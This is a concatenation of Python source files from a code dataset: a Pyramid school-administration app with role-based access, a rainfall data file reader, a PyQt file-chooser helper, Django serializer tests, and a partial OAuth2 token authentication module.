id = Column(Integer, ForeignKey('users.id'), primary_key=True)\r\n teaches = relationship(\"Class\", backref=\"taught_by\")\r\n \r\nclass Director(Teacher): \r\n __tablename__ = 'directors'\r\n id = Column(Integer, ForeignKey('teachers.id'), primary_key=True)\r\n\r\nclass Assistant(User):\r\n __tablename__ = 'assistants'\r\n id = Column(Integer, ForeignKey(\"users.id\"), primary_key=True)\r\n\r\nBase.metadata.create_all(engine)\r\nSession = sessionmaker(bind=engine)\r\nsession = Session()\r\n\r\n# Commits session to create tables in database.\r\nsession.commit()\r\n\r\n### MAP GROUPS TO PERMISSIONS\r\n\r\nclass Root(object):\r\n # Using Access Control List to assign different permissions to each type of user.\r\n __acl__ = [\r\n (Allow, Authenticated, 'view'),\r\n (Allow, 'administrator', ('register', 'edit', 'enrol')),\r\n\t(Allow, 'director', 'enrol'),\r\n (Allow, 'teacher', ('intervene', 'edit')),\r\n ]\r\n def __init__(self, request):\r\n self.request = request\r\n\r\n \r\ndef rolefinder(login, request):\r\n if session.query(Director).filter_by(username = login).first():\r\n return [ 'teacher', 'director']\r\n elif session.query(Teacher).filter_by(username = login).first():\r\n return [ 'teacher' ]\r\n elif session.query(Administrator).filter_by(username = login).first():\r\n return ['administrator']\r\n elif session.query(Assistant).filter_by(username = login).first():\r\n return ['assistant']\r\n else:\r\n return []\r\n\r\n### DEFINE VIEWS\r\n\r\n# Copied from Michael Merickel's tutorial, with additional comments\r\n@forbidden_view_config()\r\ndef forbidden_view(request):\r\n # Authorization failure because lacking permission\r\n if authenticated_userid(request):\r\n return HTTPForbidden()\r\n\r\n # Authorization failure because not logged in\r\n loc = request.route_url('login', _query=(('next', request.path),))\r\n return HTTPFound(location=loc)\r\n\r\n@view_config(\r\n route_name='home',\r\n permission=\"view\", # invokes forbidden_view if not authenticated\r\n renderer='home.mako' # template for each view\r\n )\r\ndef home_view(request):\r\n roles = effective_principals(request)\r\n # login occurs in roles after 'system.Everyone' and 'system.Authenticated'\r\n login = roles[2]\r\n\r\n # Obtain user object and all class objects from database\r\n user = session.query(User).filter_by(username = login).first()\r\n classes = session.query(Class).all()\r\n\r\n # Determine values of remaining variables required by template\r\n isAdministrator = isTeacher = False\r\n interventions = classesTaught = []\r\n if 'administrator' in roles:\r\n isAdministrator = True\r\n elif 'teacher' in roles:\r\n isTeacher = True\r\n classesTaught = session.query(Class).filter_by(teacher_id=user.id).all()\r\n\t# Shows the 10 most recent interventions created\r\n interventions = session.query(Intervention).order_by(Intervention.id.desc()).limit(10).all()\r\n\r\n return {\r\n # Returns values required in templates\r\n 'login' : login,\r\n 'user' : user,\r\n 'classes' : classes,\r\n 'isAdministrator' : isAdministrator,\r\n 'isTeacher' : isTeacher,\r\n 'classesTaught' : classesTaught,\r\n 'interventions': interventions,\r\n }\r\n\r\n# Copied from Michael Merickel's tutorial, replacing one line and removing unused element from dictionary\r\n@view_config(\r\n route_name='login',\r\n renderer='login.mako',\r\n)\r\ndef login_view(request):\r\n # Redirect logged in user to home page\r\n if authenticated_userid(request):\r\n return HTTPFound(location=request.route_url('home'))\r\n next = request.params.get('next') or request.route_url('home')\r\n login = ''\r\n did_fail = False\r\n if 'submit' in request.POST:\r\n login = request.POST.get('login', '')\r\n passwd = request.POST.get('passwd', '')\r\n \r\n # Obtain user object from database\r\n user = session.query(User).filter_by(username=login).first()\r\n\r\n if user and user.check_password(passwd):\r\n\t # Used to locally store cookie, named auth_tkt, to set users credentials\r\n headers = remember(request, login)\r\n return HTTPFound(location=next, headers=headers)\r\n did_fail = True\r\n\r\n return {\r\n 'login': login,\r\n 'next': next,\r\n 'failed_attempt': did_fail,\r\n }\r\n\r\n# Copied from Michael Merickel's tutorial, changing a route\r\n@view_config(\r\n route_name='logout',\r\n)\r\ndef logout_view(request):\r\n # 'forget()' used to delete locally stored AuthTkt cookie, to remove credentials provided by user\r\n headers = forget(request)\r\n loc = request.route_url('login')\r\n return HTTPFound(location=loc, headers=headers)\r\n\r\n# Copied from Michael Merickel's tutorial and querying through database, instead of through a dictionary\t\r\n@view_config(\r\n route_name='users',\r\n permission=\"register\",\r\n renderer='users.mako'\r\n )\r\ndef users_view(request):\r\n # Obtain all user objects from database\r\n users = session.query(User).order_by(User.surname.asc(), User.id.asc()).all()\r\n return {\r\n 'users' : users\r\n }\r\n\t\r\n@view_config(\r\n route_name='user',\r\n permission=\"register\",\r\n renderer='user.mako',\r\n)\r\ndef user_view(request):\r\n id = request.matchdict['id']\r\n user = session.query(User).filter_by(id = id).first()\r\n if not user:\r\n raise HTTPNotFound()\r\n return {\r\n 'user': user,\r\n }\r\n\r\ndef validate_user(surname, username, passwd, password):\r\n errors = []\r\n\t\r\n # strip() gets rid of leading or trailing characters\r\n surname = surname.strip()\r\n if not surname:\r\n errors.append('Surname must not be empty, please enter surname')\r\n elif len(surname) > 20:\r\n errors.append('Please shorten surname to atmost 20 characters')\r\n # Ensures input contains only letters\r\n elif surname.isalpha() == False:\r\n errors.append('Surname must only contain letters, please re-enter surname')\r\n\r\n username = username.strip()\r\n if not username:\r\n errors.append('Username must not be empty, please enter username')\r\n elif len(username) > 10:\r\n errors.append('Please shorten username to atmost 10 characters')\r\n # Checks database to verify username is unique\r\n usernameInUse = session.query(User).filter_by(username = username).first()\r\n if usernameInUse:\r\n errors.append('Username is already in use, please enter a different username')\r\n \r\n for p in [passwd, password]:\r\n p = p.strip()\r\n if not p:\r\n errors.append('Password must not be empty, please enter a password')\r\n elif len(p) < 5 :\r\n errors.append('Password must be at least 5 characters long, please enter a password')\r\n\t\r\n # confirms password entered is the one desired\r\n if passwd != password:\r\n errors.append('Password fields must match, please try again')\r\n return {\r\n 'surname': surname,\r\n 'username': username,\r\n 'password' : password,\r\n 'passwd': passwd,\r\n 'errors': errors,\r\n }\r\n\r\n@view_config(\r\n route_name='register',\r\n permission='register',\r\n renderer='edit_user.mako'\r\n)\r\ndef register_user(request):\r\n # 'role' extracted from the URL \r\n role = request.matchdict['role']\r\n if not role in ['administrator', 'teacher', 'director', 'assistant']:\r\n raise HTTPNotFound()\r\n \r\n errors = []\r\n surname = username = password = ''\r\n \r\n # Uses template to retrieve values for variables\r\n if request.method == 'POST':\r\n title = request.POST.get('title') \r\n surname = request.POST.get('surname', '')\r\n username = request.POST.get('username', '') \r\n passwd = request.POST.get('passwd', '')\r\n password = request.POST.get('password', '') \r\n\r\n v = validate_user(surname, username, passwd, password)\r\n surname = v['surname']\r\n username = v['username']\r\n passwd = v['passwd']\r\n password = v['password']\r\n errors += v['errors']\r\n\r\n # stores all attributes of user in dictionary\r\n attributes = {'title': title,\r\n 'surname': surname.capitalize(),\r\n 'username': username,\r\n 'password': password\r\n }\r\n if not errors:\r\n # Use ** operator to unpack dictionary to deliver keyword arguments\r\n if role == 'administrator':\r\n newUser = Administrator(**attributes)\r\n elif role == 'teacher':\r\n newUser = Teacher(**attributes)\r\n elif role == 'director':\r\n newUser = Director(**attributes)\r\n else: # role == 'assistant':\r\n newUser = Assistant(**attributes)\r\n session.add(newUser)\r\n session.commit()\r\n \r\n url = request.route_url('user', id=newUser.id)\r\n return HTTPFound(location=url)\r\n\r\n return {\r\n 'surname': surname,\r\n 'username': username,\r\n 'password' : password,\r\n 'errors': errors\r\n }\r\n\r\n@view_config(\r\n route_name='students',\r\n permission=\"view\",\r\n renderer='students.mako'\r\n )\r\ndef students_view(request):\r\n roles = effective_principals(request)\r\n # login occurs in roles after 'system.Everyone' and 'system.Authenticated'\r\n login = roles[2]\r\n\t\r\n # Locates user object with the same username as in 'effective_principals'\r\n user = session.query(User).filter_by(username = login).first()\r\n\r\n # List of all students in alphabetical order\r\n students = session.query(Student).order_by(Student.surname.asc(), Student.forename.asc(), Student.id.asc()).all()\r\n isAdministrator = isTeacher = False\r\n classesTaught = studentsTaught = []\r\n\r\n if 'administrator' in roles:\r\n isAdministrator = True\r\n if 'teacher' in roles:\r\n isTeacher = True\r\n # Finds all classes taught by the user\r\n classesTaught = session.query(Class).filter_by(teacher_id = user.id).all()\r\n\t\t\r\n # Use set comprehension to remove duplicate students\r\n setOfStudentsTaught = {st for cl in classesTaught for st in cl.students}\r\n # Use list comprehension to put in alphabetical order \r\n studentsTaught = [st for st in students if st in setOfStudentsTaught] \r\n\r\n return {\r\n 'students' : students,\r\n\t'isAdministrator': isAdministrator,\r\n\t'isTeacher': isTeacher,\r\n\t'classesTaught': classesTaught,\r\n\t'studentsTaught': studentsTaught,\r\n }\r\n\r\n@view_config(\r\n route_name='student',\r\n permission=\"view\",\r\n renderer='student.mako'\r\n )\r\ndef student_view(request):\r\n roles = effective_principals(request)\r\n login = roles[2]\r\n id = request.matchdict['id']\r\n # Finds student object using ID in URL and matching to ID in students table\r\n student = session.query(Student).filter_by(id = id).first()\r\n if not student:\r\n raise HTTPNotFound()\r\n \r\n isTeacher = isAssistant = False\r\n \r\n if 'teacher' in roles:\r\n isTeacher = True\r\n if 'assistant' in roles:\r\n isAssistant = True\r\n \r\n return {\r\n 'student': student,\r\n\t'isTeacher': isTeacher,\r\n\t'isAssistant': isAssistant,\r\n }\r\n\r\ndef validate_student(forename, surname, address):\r\n errors = []\r\n\r\n forename = forename.strip()\r\n if not forename:\r\n errors.append('Forename may not be empty, please enter forename')\r\n elif len(forename) > 20:\r\n errors.append('Please shorten forename to atmost 20 characters')\r\n elif forename.isalpha() == False:\r\n errors.append('Forename must only contain letters, please re-enter forename')\r\n\r\n surname = surname.strip()\r\n if not surname:\r\n errors.append('Surname may not be empty, please enter surname')\r\n elif len(surname) > 20:\r\n errors.append('Please shorten surname to atmost 20 characters')\r\n elif surname.isalpha() == False:\r\n errors.append('Surname must only contain letters, please re-enter surname')\r\n\t\t\r\n address = address.strip()\r\n if not address:\r\n errors.append('Address may not be empty, please enter address')\r\n elif len(surname) > 50:\r\n errors.append('Please shorten address to atmost 50 characters')\r\n\t\t\r\n return {\r\n 'forename': forename,\r\n 'surname': surname,\r\n 'address': address,\r\n 'errors': errors,\r\n }\r\n\r\n@view_config(\r\n route_name='add_student',\r\n permission='register',\r\n renderer='edit_student.mako'\r\n)\r\ndef add_student(request): \r\n errors = []\r\n forename = surname = address = ''\r\n if request.method == 'POST':\r\n forename = request.POST.get('forename', '')\r\n surname = request.POST.get('surname', '')\r\n address = request.POST.get('address', '')\r\n\r\n v = validate_student(forename, surname, address)\r\n forename = v['forename']\r\n surname = v['surname']\r\n address = v['address']\r\n errors += v['errors']\r\n\r\n if not errors:\r\n newStudent = Student(forename=forename.capitalize(), surname=surname.capitalize(), address=address)\r\n session.add(newStudent)\r\n session.commit()\r\n url = request.route_url('student', id=newStudent.id)\r\n return HTTPFound(location=url)\r\n\r\n return {\r\n 'forename': forename,\r\n 'surname': surname,\r\n 'address': address,\r\n 'errors': errors,\r\n }\r\n\r\ndef validate_intervention(content):\r\n errors = []\r\n content = content.strip()\r\n if not content:\r\n errors.append('Content may not be empty, please enter content')\r\n elif len(content) > 300:\r\n errors.append('Please shorten content to atmost 300 characters')\r\n return {\r\n 'content': content,\r\n 'errors': errors,\r\n }\r\n\r\n@view_config(\r\n route_name='intervene',\r\n permission='intervene',\r\n renderer='intervene.mako'\r\n )\r\ndef edit_intervention(request):\r\n login = authenticated_userid(request)\r\n # Locates user object with the same username as the one in request, from database\r\n user = session.query(User).filter(login == User.username).first()\r\n \r\n errors = []\r\n date_time = content = ''\r\n student_id = request.matchdict['id']\r\n if request.method == 'POST':\r\n content = request.POST.get('content', '')\r\n\r\n v = validate_intervention(content)\r\n content = v['content']\r\n errors += v['errors']\r\n\r\n if not errors:\r\n\t # Formatted to show date time format as dd/mm/yy HH:MM\r\n date_time = datetime.now().strftime(\"%d/%m/%y %H:%M\")\r\n int1 = Intervention(date_time=date_time, content=content)\r\n session.add(int1)\r\n # Assigning foreign keys to Intervention object for relationships between tables\r\n int1.student_id = student_id\r\n int1.teacher_id = user.id\r\n session.commit()\r\n url = request.route_url('student', id=student_id)\r\n return HTTPFound(location=url)\r\n return {\r\n 'date_time': date_time,\r\n 'content': content,\r\n 'student_id': student_id,\r\n 'user': user,\r\n 'errors': errors,\r\n }\r\n\r\n@view_config(\r\n route_name='edit_student_in_class',\r\n permission=\"edit\",\r\n renderer='edit.mako'\r\n )\r\ndef edit_student_in_class_view(request):\r\n student_id = request.matchdict['id']\r\n class_id = request.matchdict['classId']\r\n\t\r\n roles = effective_principals(request)\r\n login = roles[2]\r\n # Finds user object by looking up username with the one from effective_principals\r\n user = session.query(User).filter_by(username = login).first()\r\n assoc = session.query(Association).filter_by(student_id=student_id, class_id=class_id).first()\r\n cl = session.query(Class).filter_by(id = class_id).first()\r\n \r\n isAdministrator = isTeacher = teachesClass = isDirector = False\r\n\r\n if 'administrator' in roles:\r\n isAdministrator = True\r\n if 'teacher' in roles:\r\n isTeacher = True\r\n if cl.teacher_id == user.id:\r\n teachesClass = True\r\n if 'director' in roles:\r\n isDirector = True\r\n\t\r\n if request.method == 'POST':\r\n # Only teacher can edit grade\r\n if isTeacher:\r\n # Only teacher assigned to the class or director is permitted to change the grades\r\n if teachesClass or isDirector:\r\n grade = request.POST.get('grade')\r\n assoc.grade = grade\r\n else:\r\n return HTTPForbidden()\r\n # Only administrator or director can change status\r\n if isAdministrator or isDirector:\r\n status = request.POST.get('status')\r\n assoc.status = status\r\n session.commit()\r\n url = request.route_url('student', id=student_id)\r\n return HTTPFound(location=url)\r\n\t\t\r\n return {\r\n 'student_id' : student_id,\r\n 'user': user,\r\n 'cl': cl,\r\n 'isAdministrator': isAdministrator,\r\n\t'isTeacher': isTeacher,\r\n 'teachesClass': teachesClass,\r\n\t'isDirector': isDirector,\r\n }\r\n\r\n@view_config(\r\n route_name='classes',\r\n permission=\"view\",\r\n renderer='classes.mako'\r\n )\r\ndef classes_view(request):\r\n roles = effective_principals(request)\r\n login = roles[2]\r\n\t\r\n user = session.query(User).filter_by(username = login).first()\r\n classes = session.query(Class).all()\r\n\r\n isAdministrator = isTeacher = False\r\n classesTaught = []\r\n \r\n if 'administrator' in roles:\r\n isAdministrator = True\r\n if 'teacher' in roles:\r\n isTeacher = True\r\n classesTaught = session.query(Class).filter(Class.teacher_id == user.id).all()\r\n return {\r\n\t'classes' : classes,\r\n\t'isAdministrator': isAdministrator,\r\n\t'isTeacher': isTeacher,\r\n 'classesTaught' : classesTaught,\r\n }\r\n\r\n@view_config(\r\n route_name='class',\r\n permission=\"view\",\r\n renderer='class.mako'\r\n )\r\ndef class_view(request):\r\n id = request.matchdict['id']\r\n cl = session.query(Class).filter_by(id = id).first()\r\n if not cl:\r\n raise HTTPNotFound()\r\n \r\n roles = effective_principals(request)\r\n login = roles[2]\r\n teacher = session.query(User).filter(cl.teacher_id == User.id).first()\r\n\r\n isAdministrator = isDirector = isAssistant = False\r\n \r\n if 'administrator' in roles:\r\n isAdministrator = True\r\n if 'director' in roles:\r\n isDirector = True\r\n if 'assistant' in roles:\r\n isAssistant = True\r\n return {\r\n 'cl': cl,\r\n 'teacher': teacher,\r\n 'isAdministrator': isAdministrator,\r\n 'isDirector': isDirector,\r\n\t'isAssistant': isAssistant,\r\n }\r\n\r\ndef validate_class(name):\r\n errors = []\r\n \r\n name = name.strip()\r\n if not name:\r\n errors.append('Name must not be empty, please enter the name of the class.')\r\n elif len(name) > 20:\r\n errors.append('Please shorten name to atmost 20 characters')\r\n # Checks database to verify class name is unique\r\n classNameInUse = session.query(Class).filter_by(name = name).first()\r\n if classNameInUse:\r\n errors.append('The name for your class is already in use, please enter another name.')\r\n \r\n return {\r\n 'name': name,\r\n 'errors': errors,\r\n }\r\n\r\n@view_config(\r\n route_name='add_class',\r\n permission='register',\r\n renderer='create_class.mako'\r\n )\r\ndef add_class(request):\r\n errors = []\r\n name = ''\r\n if request.method == 'POST':\r\n name = request.POST.get('name', '')\r\n\r\n v = validate_class(name)\r\n name = v['name']\r\n errors += v['errors']\r\n\r\n if not errors: # check class exists\r\n cl = Class(name=name)\r\n session.add(cl)\r\n session.commit()\r\n url = request.route_url('assign_teacher', id=cl.id)\r\n return HTTPFound(location=url)\r\n\r\n return {\r\n 'name': name,\r\n 'errors': errors,\r\n }\r\n\r\n@view_config(\r\n route_name='assign_teacher',\r\n permission='register',\r\n renderer='assign.mako'\r\n )\r\ndef assign_teacher(request):\r\n class_id = request.matchdict['id']\r\n teachers = session.query(Teacher).all()\r\n \r\n if 'submit' in request.POST:\r\n teacher_id = request.POST.get('teacher_id')\r\n cl = session.query(Class).filter(Class.id==class_id).first()\r\n # Assigning value to foreign key to establish relationship\r\n cl.teacher_id = teacher_id\r\n session.commit()\r\n url = request.route_url('class', id = class_id)\r\n return HTTPFound(location=url)\r\n\r\n return {\r\n 'class_id': class_id,\r\n 'teachers': teachers,\t\t\r\n 'teachers': session.query(Teacher).all(),\r\n }\r\n\r\n@view_config(\r\n route_name='enrol_students',\r\n permission='enrol',\r\n renderer='enrol.mako'\r\n )\r\ndef enrol_students(request):\r\n class_id = request.matchdict['id']\r\n currentClass = session.query(Class).filter_by(id=class_id).first()\r\n students = session.query(Student).all()\r\n\r\n # Check students exist and are not already enrolled in currentClass\r\n notEnrolledStudents = [st for st in students if not st in currentClass.students]\r\n\t\r\n if request.method == 'POST':\r\n student_ids = request.POST.getall('student_id')\r\n \r\n for student_id in student_ids:\r\n\t # Create new Association object for student with status set by default to 'Active'\r\n student = Association(class_id=class_id, student_id=student_id, grade='', status='Active')\r\n session.add(student)\r\n session.commit()\r\n url = request.route_url('class', id=class_id)\r\n return HTTPFound(location=url)\r\n \r\n return {\r\n 'currentClass': currentClass,\r\n 'class_id': class_id,\r\n 'notEnrolledStudents': notEnrolledStudents,\r\n }\r\n\r\n# Copied from Merickel's tutorial, with modified routes, and additional parameters in authn_policy\r\n### CONFIGURE PYRAMID\r\n\r\ndef main(global_settings, **settings):\r\n authn_policy = AuthTktAuthenticationPolicy(\r\n settings['auth.secret'],\r\n # Callback passes to userid and request, returns a sequence of principal identifiers if the user exists. \r\n callback=rolefinder,\r\n # Used to timeout session based on inactivity\r\n # The maximum time a newly issued ticket will be considered valid, until expiring\r\n timeout=1200,\r\n # time that must pass before an auth_tkt is automatically reissued as the result of a request which requires authentication\r\n reissue_time=120,\r\n hashalg='sha512'\r\n )\r\n authz_policy = ACLAuthorizationPolicy()\r\n\r\n config = Configurator(\r\n settings=settings,\r\n authentication_policy=authn_policy,\r\n authorization_policy=authz_policy,\r\n root_factory=Root,\r\n )\r\n \r\n config.add_route('login', '/login')\r\n config.add_route('logout', '/logout')\r\n config.add_route('home', '/')\r\n \r\n config.add_route('users', '/users')\r\n config.add_route('user', '/user/{id}')\r\n config.add_route('register', '/register/{role}')\r\n \r\n config.add_route('students', '/students')\r\n config.add_route('student', '/student/{id}')\r\n config.add_route('add_student', '/add_student')\r\n config.add_route('intervene', '/student/{id}/intervene')\r\n config.add_route('edit_student_in_class', '/student/{id}/{classId}')\r\n\r\n config.add_route('classes', '/classes')\r\n config.add_route('class', '/class/{id}')\r\n config.add_route('add_class', '/add_class')\r\n config.add_route('assign_teacher', '/class/{id}/assign')\r\n config.add_route('enrol_students', '/class/{id}/enrol')\r\n\r\n config.scan(__name__)\r\n return config.make_wsgi_app()\r\n\r\n# Copied from Merickels tutorial, changing the auth.secret and switching to a more stable server\r\n### SIMPLE STARTUP\r\nif __name__ == '__main__':\r\n settings = {\r\n # secret should be at least as long as the block size of the selected hash algorithm, 64 characters in the case of sha512\r\n 'auth.secret': '584A07CED70EDBF8146A76133B41D4070EEF41645CC77DB0610383B234FC38EB',\r\n 'mako.directories': '%s:templates' % __name__,\r\n }\r\n app = main({}, **settings)\r\n\r\n '''from waitress import serve\r\n serve(app, host='0.0.0.0', port=5000)'''\r\n from wsgiref.simple_server import make_server\r\n server = make_server('0.0.0.0', 5000, app)\r\n server.serve_forever()\r\n","sub_path":"WorkingProject.py","file_name":"WorkingProject.py","file_ext":"py","file_size_in_byte":27208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"169146698","text":"from __future__ import print_function\nfrom pydoc import help\nfrom pyhdf.SD import *\nimport numpy\nfrom numpy import *\nimport pprint\nfrom netCDF4 import Dataset\nimport glob\nfrom os.path import basename\n\n#writing prediction data into file\n# writePrediction = open('D:/Development/PyCharm/dataset/rain_data/predictions.csv', 'w')\n# writePrediction.truncate()\n#\n# #writing verification data into file\n# writeVerfication = open('D:/Development/PyCharm/dataset/rain_data/verifications.csv', 'w')\n# writeVerfication.truncate()\n\nstarting_time1 = '000000'\nstarting_time = '000000'\n\n# reading predictions files by time\nfor predictions in glob.glob(\"D:/Development/PyCharm/dataset/rain_data/prediction/*\"):\n # saving the time value into datetime variable\n datetime = basename(predictions).split('_')[0]\n print('Date:' + datetime)\n # print(predictions)\n\n print('VERIFICATION DATA')\n # reading verification time\n for verification in glob.glob(\"D:/Development/PyCharm/dataset/rain_data/verification/\" + str(datetime) + \"/*\"):\n # print(verification)\n ending_time = basename(verification).split('_')[1]\n # print(ending_time)\n\n hdfFile = SD(verification, SDC.READ)\n datasets_dic = hdfFile.datasets()\n\n sds_obj = hdfFile.select('acc03_') # select sds\n data = sds_obj.get() # get sds data\n\n print('Starting Time: ' + starting_time)\n print('Ending Time: ' + ending_time)\n print(data)\n print('-------------------------------')\n\n # writeVerfication.write(str(datetime) + '_' + str(starting_time) + ',')\n # writeVerfication.write(str(datetime) + '_' + str(ending_time) + ',')\n #\n # for i in range(0,1155):\n # for j in range(0,1683):\n # writeVerfication.write(str(data[0][i][j]))\n # writeVerfication.write(', ')\n # # writeVerfication.write('\\n')\n # writeVerfication.write('\\n')\n\n starting_time = ending_time\n\n # numpy.savetxt(\"D:/Development/PyCharm/dataset/rain_data/foo.csv\", data[0,...], delimiter=\",\",fmt='%d')\n\n print('-------------------------------\\n------------------------------\\n------------------------------')\n\n print('PREDICTION DATA')\n for core in glob.glob(predictions + str('/*')):\n for rainInfo in glob.glob(core + str('/*')):\n\n ending_time1 = basename(rainInfo).split('_')[1]\n # print(ending_time1)\n # print(rainInfo)\n\n netcdfFile = Dataset(rainInfo)\n rain = netcdfFile.variables['acc03_']\n\n print('Starting Time: ' + starting_time1)\n print('Ending Time: ' + ending_time1)\n print('Prediction Set Title:' + str(basename(core)))\n print(rain[0][:][:])\n print('-------------------------------')\n\n # writePrediction.write(str(datetime) + '_' + str(starting_time1) + ',')\n # writePrediction.write(str(datetime) + '_' + str(ending_time1) + ',')\n # writePrediction.write(str(basename(core)))\n #\n # for i in range(0, 1155):\n # for j in range(0, 1683):\n # writePrediction.write(str(rain[0][i][j]))\n # writePrediction.write(', ')\n # # writePrediction.write('\\n')\n # writePrediction.write('\\n')\n\n starting_time1 = ending_time1\n\n","sub_path":"ReadAllRainFilesDemo.py","file_name":"ReadAllRainFilesDemo.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"310897059","text":"from PyQt5.QtWidgets import QFileDialog, QLineEdit\n\n\nclass TabManager:\n @staticmethod\n def get_cover_path(data, label):\n file_path = QFileDialog().getOpenFileName(None, 'Choose a song', '', 'JPG files (*.jpg);;PNG files (*.png)')\n if file_path[0] != '':\n data['cover_path'] = file_path[0]\n label.setText(f'Cover: {file_path[0]}')\n label.setToolTip(file_path[0])\n else:\n label.setText('Cover: No file selected')\n data['cover_path'] = None\n\n @staticmethod\n def get_song_path(data, label):\n file_path = QFileDialog().getOpenFileName(None, 'Choose an image', '', 'MP3 files (*.mp3);;WAV files (*.wav)')\n if file_path[0] != '':\n data['song_path'] = file_path[0]\n label.setText(f'Song: {file_path[0]}')\n label.setToolTip(file_path[0])\n else:\n label.setText('Song: No file selected')\n data['song_path'] = None\n\n @staticmethod\n def show_custom_genre(combobox, grid, custom_input):\n if combobox.currentText() == 'Custom': # Add an input if the genre 'Custom' is selected\n return grid.addWidget(custom_input, 9, 1)\n","sub_path":"src/gui/tabmanager.py","file_name":"tabmanager.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"497560180","text":"import uuid\nfrom decimal import Decimal\n\nimport pytest\n\nfrom django.utils import timezone\n\nfrom work_at_olist.serializers import TelephoneBillSerializer\n\n\npytestmark = [pytest.mark.django_db, pytest.mark.serial]\n\n\ndef test_should_serialize_telephone_bill(telephone_bill):\n # GIVEN\n # WHEN\n serializer = TelephoneBillSerializer(telephone_bill)\n\n # THEN\n assert isinstance(serializer.data, dict)\n assert serializer.data.get('destination') == '48984359051'\n assert serializer.data.get('call_start_time') == '06:00:00'\n assert serializer.data.get('call_duration') == '0:02:46.956000'\n assert serializer.data.get('call_price') == '0.54'\n\n\ndef test_should_deserialize_telephone_bill():\n # GIVEN\n call_id = uuid.uuid4()\n telephone_bill_data = {\n 'call_id': call_id,\n 'destination': '48984359051',\n 'call_start_date': timezone.now(),\n 'call_start_time': '06:00:00',\n 'call_duration': '0:02:46.956000',\n 'call_price': '0.54',\n }\n\n # WHEN\n serializer = TelephoneBillSerializer(data=telephone_bill_data)\n\n # THEN\n assert serializer.is_valid()\n\n telephone_bill = serializer.validated_data\n assert telephone_bill['destination'] == '48984359051'\n assert telephone_bill['call_start_time'] == '06:00:00'\n assert telephone_bill['call_duration'] == '0:02:46.956000'\n assert telephone_bill['call_price'] == Decimal('0.54')\n","sub_path":"work_at_olist/tests/test_telephone_bill_serializer.py","file_name":"test_telephone_bill_serializer.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"318538913","text":"import logging\nfrom hashlib import sha256\nfrom urlparse import parse_qsl\n\nfrom django.http import HttpResponse\nfrom django.utils import simplejson\n\nfrom . import settings\nfrom . import constants\nfrom .models import Token\nfrom .utils import TimestampGenerator\nfrom .exceptions import InvalidRequest, InvalidToken, InsufficientScope\n\nlog = logging.getLogger(__name__)\n\ndef authenticate(request):\n authentication_method = None\n \n if 'HTTP_AUTHORIZATION' in request.META:\n auth = request.META['HTTP_AUTHORIZATION'].split()\n authentication_method = auth[0].lower()\n \n if authentication_method == 'bearer':\n access_token = ' '.join(auth[1:]).strip()\n \n elif authentication_method == 'mac':\n mac_header = ' '.join(auth[1:]).strip()\n \n else:\n access_token = request.REQUEST.get('access_token')\n if access_token is not None:\n authentication_method = 'bearer'\n \n if authentication_method is None:\n raise InvalidRequest('No authentication credentials provided.')\n \n if authentication_method not in ['bearer', 'mac']:\n raise InvalidRequest('Authentication method \"%s\" is not supported.' % authentication_method)\n \n token = None\n now = TimestampGenerator()()\n \n if authentication_method == 'bearer':\n if settings.AUTHENTICATION_METHOD & constants.BEARER == 0:\n raise InvalidToken('Bearer authentication is not supported.')\n \n try:\n token = Token.objects.get(access_token=access_token)\n \n except Token.DoesNotExist:\n raise InvalidToken('Token doesn\\'t exist')\n \n elif authentication_method == 'mac':\n if settings.AUTHENTICATION_METHOD & constants.MAC == 0:\n raise InvalidToken('MAC authentication is not supported.')\n \n request_hostname = request.META.get('REMOTE_HOST')\n if request_hostname is None:\n raise InvalidRequest('Request does not contain a hostname.')\n \n request_port = request.META.get('SERVER_PORT')\n if request_port is None:\n raise InvalidRequest('Request does not contain a port.')\n \n request_method = request.method.upper()\n \n mac_header = parse_qsl(mac_header.replace(',', '&').replace('\"', ''))\n mac_header = dict([(x[0].strip(), x[1].strip()) for x in mac_header])\n for parameter in ['id', 'nonce', 'mac']:\n if 'parameter' not in mac_header:\n raise InvalidToken('MAC Authorization header does not contain required parameter \"%s\"' % parameter)\n if 'bodyhash' in mac_header:\n bodyhash = mac_header['bodyhash']\n else:\n bodyhash = ''\n if 'ext' in mac_header:\n ext = mac_header['ext']\n else:\n ext = ''\n \n nonce_timestamp, nonce_string = mac_header['nonce'].split(':')\n mac = sha256('\\n'.join([\n mac_header['nonce'], # The nonce value generated for the request\n request_method, # The HTTP request method \n 'XXX', # The HTTP request-URI\n request_hostname, # The hostname included in the HTTP request\n request_port, # The port as included in the HTTP request\n bodyhash,\n ext\n ])).hexdigest()\n \n log.debug('%s %s %s' % (nonce_timestamp, nonce_string, mac))\n raise NotImplementedError()\n \n # TODO:\n # 1. Recalculate the request body hash (if included in the request) as\n # described in Section 3.2 and request MAC as described in\n # Section 3.3 and compare the request MAC to the value received\n # from the client via the \"mac\" attribute.\n # 2. Ensure that the combination of nonce and MAC key identifier\n # received from the client has not been used before in a previous\n # request (the server MAY reject requests with stale timestamps;\n # the determination of staleness is left up to the server to\n # define).\n # 3. Verify the scope and validity of the MAC credentials.\n\n if token.expire < now:\n raise InvalidToken('Token is expired')\n \n return (token.user, token.scopes.all())\n\ndef has_scope_name(scope_name, scopes):\n scope_names = set([ scope.name for scope in scopes ])\n return scope_name in scope_names\n\ndef error_response(exception, content='', content_type=None):\n '''\n Error response generator. Returns an HttpResponse object with status code\n 400/401/403 and the appropriate headers set.\n\n **Kwargs:**\n * *content:* See Django docs. *Default ''*\n * *content_type:* See Django docs. *Default DEFAULT_CONTENT_TYPE*\n '''\n if content_type:\n response = HttpResponse(content, content_type=content_type)\n else:\n response = HttpResponse(content)\n \n if exception is None:\n response['WWW-Authenticate'] = 'Bearer realm=\"%s\"' % settings.REALM\n response.status_code = 401\n return response\n\n else:\n error = getattr(exception, 'error', 'invalid_request')\n error_description = exception.message\n \n header = [\n 'Bearer realm=\"%s\"' % settings.REALM,\n 'error=\"%s\"' % error,\n 'error_description=\"%s\"' % error_description\n ]\n \n if isinstance(exception, InsufficientScope):\n header.append('scope=%s' % exception.required_scope)\n response.status_code = 403\n \n elif isinstance(exception, InvalidToken):\n response.status_code = 401\n \n elif 